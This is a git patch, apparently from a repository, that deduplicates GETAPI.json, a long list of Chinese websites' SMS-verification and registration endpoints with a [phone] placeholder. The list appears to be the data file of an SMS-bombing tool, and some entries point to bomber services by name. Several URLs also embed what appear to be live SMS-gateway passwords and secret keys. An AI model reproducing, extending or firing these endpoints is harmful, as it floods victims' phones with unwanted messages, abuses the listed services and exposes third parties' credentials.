"http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=App Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.zangcun.com/registerCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8" +] From a1c0f555f68e061a768becd8e22a0d0378ceab69 Mon Sep 17 00:00:00 2001 From: FannieMC <73371677+FannieMC@users.noreply.github.com> Date: Mon, 9 May 2022 00:06:43 +0800 Subject: [PATCH 7/8] Update GETAPI.json MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 去除大量重复数据 --- GETAPI.json | 6863 ++++++++++----------------------------------------- 1 file changed, 1237 insertions(+), 5626 deletions(-) diff --git a/GETAPI.json b/GETAPI.json index c612ae0..995b907 100755 --- a/GETAPI.json +++ b/GETAPI.json @@ -1,5644 +1,1255 @@ [ - "http://101.132.126.166:8080/message/sendVerifyCode?callback=successCallback&mobilePhone=&t=1589625247333action_type=regist&mobile=[phone]", - "http://1314.buzz/index.php?hm=[phone]", - "http://1314.buzz:80/index.php?hm=[phone]", - "http://19.offcn.com/send_message/seccode/?0.8413693207408235&msgpic=user=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://218.57.131.146/cwbase/ep/handlers/RouteHandler.ashx?action=GetPhoneVerCode&PhoneNum=action=GetPhoneVerCode&PhoneNum=[phone]", - "http://221.179.180.158:9008/HttpQuickProcess/submitMessageAll?OperID=zjawu&OperPass=AqBTaIWp&DesMobile=[phone]", - "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", - "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO+6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC+/CA&phone=[phone]", - "http://account.ilongyuan.com.cn/index.php?s=/home/user/verify.html&random=0.8012450194754068&client_id=&verify=[phone]", - "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", - "http://api.duo17.com/sendsms.do?os_type=android&app_version=2.4.0.0&device_id=860903034476097&pnum=[phone]", - "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", - "http://api.gaotu100.com/user/v2/send_passcode?captcha_mode=NETEASE&type=3&mobile=[phone]&code_type=0", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=+86&mobile=[phone]", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=+86&mobile=[phone]", - "http://api.hhyp58.com/basis/sendCheckCode?mobile=[phone]", - "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]", - "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone6S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]", - "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]", - "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]", - "http://api.moonreader.cn/mreader/common/sendMobile.do?mobile=[phone]", - "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]", - "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", - "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=+86[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", - "http://api.qingmang.me/v1/account.sendVerification?token=&phone=%2B86[phone]&code=70428334", - "http://api.sms.cn/sms/?ac=send&uid=sun98&pwd=5a509d25c595fcec2561652992f1915b&template=542423&mobile=[phone]", - "http://api.sms.cn/sms/?ac=send&uid=sun98&pwd=5a509d25c595fcec2561652992f1915b&template=542423&mobile=[phone]&content={%22code%22:%22HQ98B%22}", - "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]", - "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", - "http://api.v2.msparis.com/common/mobile?channel=AppStore-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]", - "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://api.yinka.co/common/sms?cellphone=[phone]", - "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", - "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]", - "http://app.ftutj.cn/web/api.php?s=/Join/verify/?0.24206258677631287&picCode=[phone]", - "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data={'phone':'[phone]", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "http://bdp.haoyisheng.com/bdp/checkCode/getChkCode?timestamp=1600272327075mobileNum=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi4A&osLevel=23&phone=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]&token=", - "http://cd.abiz.com/v3validcode?t=1604046053252¤tFindType=1&pageType=7&pn=abiz&validateCode=currentFindValue=[phone]", - "http://center.siyi.cn/process.aspx?c=sendvcode&vt=sms&va=reg&mobile=[phone]", - "http://cms.51fenmi.com/api/base/public/getCode?mobile=[phone]", - "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", - "http://codingle.cn/api/user/register/tel_verify?tel=[phone]", - "http://ct.ctrip.com/me/register/Verify?name=%E5%90%B4%E5%A5%87&email=357058116%40qq.com&mobile=[phone]&passwd=xiyu8187", - "http://cuckooshop.cn/SMS?phone=[phone]", - "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]", - "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]", - "http://edms.fcbox.com/hibox/weixin/getVerifyCode?mobilePhone=[phone]", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]", - "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]", - "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", - "http://gj.liansuosoft.com/ShopRegister/VCode?rand=0.3306040567511852&code=[phone]", - "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]", - "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]", - "http://h5.gmccopen.com/act/sso!sendSms.action?mobile=[phone]", - "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]", - "http://haojue78.com/WS/WSAccount.asmx/SendMobileMsg?mobile=[phone]", - "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]", - "http://hdh.10086.cn/common/validationIP?phone=[phone]", - "http://hyuser.91huayi.com/ashx/sendSmsValidateCode.ashx?mobile=[phone]", - "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]", - "http://i.kuwo.cn/US/2014/api/send_sms.jsp?mobile=[phone]", - "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", - "http://iclass.ruijie.com.cn/icmgr/rest/techReg/sms?timeStamp=1605428709505&phoneNo=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", - "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://jzplatform.com/distributor/sendcode_do.phpe.account=[phone]", - "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]", - "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", - "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", - "http://kyddn.log56.com/sq_server/verifyCode.action?mobile_no=[phone]", - "http://ld.liandan100.com/ldmgr/api/user/sendVerifySms?platform=1&versionNum=53&&r=&partnerId=[phone]", - "http://liuyan.people.com.cn/verifycode/rand4?t=1603181060151&verCode=phoneNum=[phone]", - "http://lndx.edu.cn/Third/Mobile_SMS?Mobile=[phone]&beCallPhone=15810904000", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", - "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", - "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]", - "http://m.egou.com/validate_phone.htm?phone=[phone]", - "http://m.fanli.com/invite/sendverifycode?jsoncallback=jsonp2&pos=601&t=1488608297799&mobile=[phone]", - "http://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://m.huibo.com/register/getAuthCode?txtPhone=[phone]", - "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", - "http://m.jiguo.com/mb/api/validatecode/color/mb.html?d=0.7554753933168952&vcode=tel=[phone]", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.sjingbang.com/api/app/sendSmsCode%2522,%2522rediskey%2522:%2522AppRegValidate%2522,%2522gjdqCode%2522:%252286%2522%257D&_1600248070800=[phone]", - "http://m.tk.cn/tkmobile/service/member?function_code=dynamicLogin&login_mobile=[phone]", - "http://m.xymens.com/index.php/Home/User/send_code?mobile=[phone]", - "http://m.yst.com.cn/pc/code/phone/regist?phone=[phone]", - "http://m.zhenai.com/v2/register/resendMobileCode.do?baseInfo2.serviceMobile=[phone]", - "http://maintain.yunzhandata.com/internal/customer/sendcode.json?mobile=[phone]", - "http://mall.95572.com/mobile/member/register/web/captcha?mobile=[phone]", - "http://mall.juzifenqi.com/termi/sendVerifySMSVH?mobile=[phone]&flag=1&verifyCode=", - "http://manage.univisa.cn/posts/random?callback=jQuery111308764434818808016_1596972033456&phone=target=mobile&mobile=[phone]", - "http://meeting.csco.org.cn/Admin/VerificationCode/?type=1&v=1&id=1&email=&checkcode=ipass=0&mobile=[phone]", - "http://member.ehaier.com/sendMobileSmsVerify.html?mobile=[phone]", - "http://member.for68.com/member/consult/sendRandcode.shtm?mobilePhone=[phone]", - "http://member.med66.com/uc/smscode?phone=[phone]", - "http://mkxq.zymk.cn/user/v1/mobilevc/?callback=jQuery321016123103253181426_1503210785449&mobile=[phone]&service=mkn&_=1503210785451", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]", - "http://my.baihe.com/Getinterregist/getPhoneVerifyCode?jsonCallBack=jQuery18306001467584540825_1439706800918&type=2&phone=[phone]&_=1439707017074", - "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]", - "http://open.leju.com/game/member/sendcode.html?phone=[phone]", - "http://open.zhundao.com.cn/api/v2/senCode?&phoneOrEmail=[phone]", - "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", - "http://passport.12371.cn/security/getMobileCode?type=regist&mobile=[phone]", - "http://passport.17house.com/login/sendSMSForMobileLogin?mobile=[phone]", - "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", - "http://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.020283224898892227?mobileNo=[phone]&geetest_challenge=&geetest_validate=&geetest_seccode=", - "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", - "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=773", - "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", - "http://passport.ctrl.cn/sms/reg?mobile=[phone]", - "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", - "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947590&Service=home-club-web&backurl=&mobilephone=[phone]", - "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947591&Service=home-club-web&backurl=&mobilephone=[phone]", - "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]&mobilestep=1&verification_code=&verify_flag=&verify_global=ma624mg0j80trr7ldvwcl15c1f&c_aver=1.0&c_src=2&c_v=5.3.1.24&devid=63599267906091", - "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", - "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", - "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", - "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]&appId=www_home&v=2&sig=&t=1592615855903&v=2", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]", - "http://readapp.ddyvip.cn/app/user/sendLoginCode.api?appVersion=2.4.4&inviteCode=&mobile=[phone]", - "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", - "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", - "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", - "http://ruzhu.jd.com/user/sendVC?phone=[phone]", - "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", - "http://shop.shtv.net.cn/ShopWeb/Ajax/ChkSMSCode.ashx?t=0.016637186912638713&MobileCode=&type=user-registerphoneNo=[phone]", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://slb-sport.vesal.cn:80/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]", - "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", - "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", - "http://sso1.nlc.cn/sso/currency/sendCodeToMobile?mobile=[phone]", - "http://store.ncpa-classic.com/api/comm/smsNew?callback=jQuery17202866925711954793_1605436223502&mobile=[phone]", - "http://survey.dxy.cn/forms/public/survey2/captcha?sid=102998&itemid=127053&phone=[phone]", - "http://tel.kuaishang.cn/cl.php?tel=[phone]", - "http://tools.wx6.org/dianhuahongzhaji/?telcode=[phone]", - "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone6s-12.4&login=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]&app_code=ECS-2233&msg_type=01", - "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "http://user.daojia.com/mobile/getcode?mobile=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "http://user.daojia.com:80/mobile/getcode?mobile=[phone]", - "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", - "http://user.memeyule.com/authcode/send_mobile?mobile=[phone]", - "http://v.juhe.cn/sms/send?mobile=[phone]", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=", - "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", - "http://vip.timesawards.com/Method/getAuthCode?target=[phone]", - "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]", - "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", - "http://wap.10010.com/mobileService/tuiguang/sendMsg.htm?mobileNumber=[phone]", - "http://wap.ghs.net/wap/wxregister-checkMobile.html?uname=[phone]", - "http://web.5zhuan.com/?ac=getmsgcode&cphone=[phone]", - "http://web.enjoysms.cn/do/safecode.do?0.4155260914653185&VerifyCode=[phone]", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]", - "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", - "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&os=h5&_srcid=10000386", - "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", - "http://www.100ppi.com/ecp/ppi/get_sf/get_yzm.php?m=[phone]", - "http://www.12chu.com/reg/sendCode.jhtml?mobile=[phone]", - "http://www.52tanbao.com/tanbao-app-api/SendValidCode?telephone=[phone]", - "http://www.7881.com/img_valid.jsp?param=1557302312619&t=0&phone=act=reg&captcha=[phone]", - "http://www.97sq.com/dx/index.php?hm=[phone]", - "http://www.98xianyou.com/passport/sign/code.html?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]&callback=jQuery17209171715653229815_1599374652809&_=1599374671117", - "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", - "http://www.baixing.com/m/oz/verify/?fromS9=1&identity=[phone]&mobile=[phone]", - "http://www.baixing.com/oz/verify/reg?mobile=[phone]", - "http://www.baixing.com:80/m/oz/verify/reg?mobile=[phone]", - "http://www.booms.ga/index.php?hm=[phone]", - "http://www.booms.ga/mini/index.php?hm=[phone]", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "http://www.dye-ol.com/code/ValidCode.aspx?r=0.503437238889475&Code=3&UserID=0Mobile=[phone]", - "http://www.e8088.com/index/product/try!phoneVerifyCode.action?tipMessage=[phone]", - "http://www.eyprint.com/include/getcode.php?telnum=[phone]", - "http://www.fcbox.com/noshiro/retrievePhoneMessagePreventAttacks?mobilePhone=[phone]&smsType=5", - "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]", - "http://www.gmmc.com.cn/ajax/H5Handler.ashx?method=SendH5VerCode&mobile=[phone]", - "http://www.gmsweipai.com/gms/api/common/[phone]", - "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]", - "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", - "http://www.hzrc.com/ww/b/a/wwba_sendMobileCode.html?phone=[phone]", - "http://www.jc258.cn/signup/send_sms?mobile=[phone]", - "http://www.jiedai315.com/SendCode.ashx?Mobile=[phone]&Identifier=6", - "http://www.jiqinging.com/ajax.php?do=getCheckCode&tel=[phone]", - "http://www.jiqinging.com/ajax.php?do=getCheckCode+tel=[phone]", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]", - "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]", - "http://www.loho88.com/activ_check_mobile.php?activ_id=67&activ_type=mis&part_id=body_1_4&goods_id=100&is_new_customers_allow=0&phone=[phone]", - "http://www.longone.com.cn/servlet/user/Register?&function=AjaxGetPin1&mo=[phone]", - "http://www.meisupic.com/user.php?act=ajax_validate_sms&bizcode=11&captcha=type=5&mobile=[phone]", - "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", - "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", - 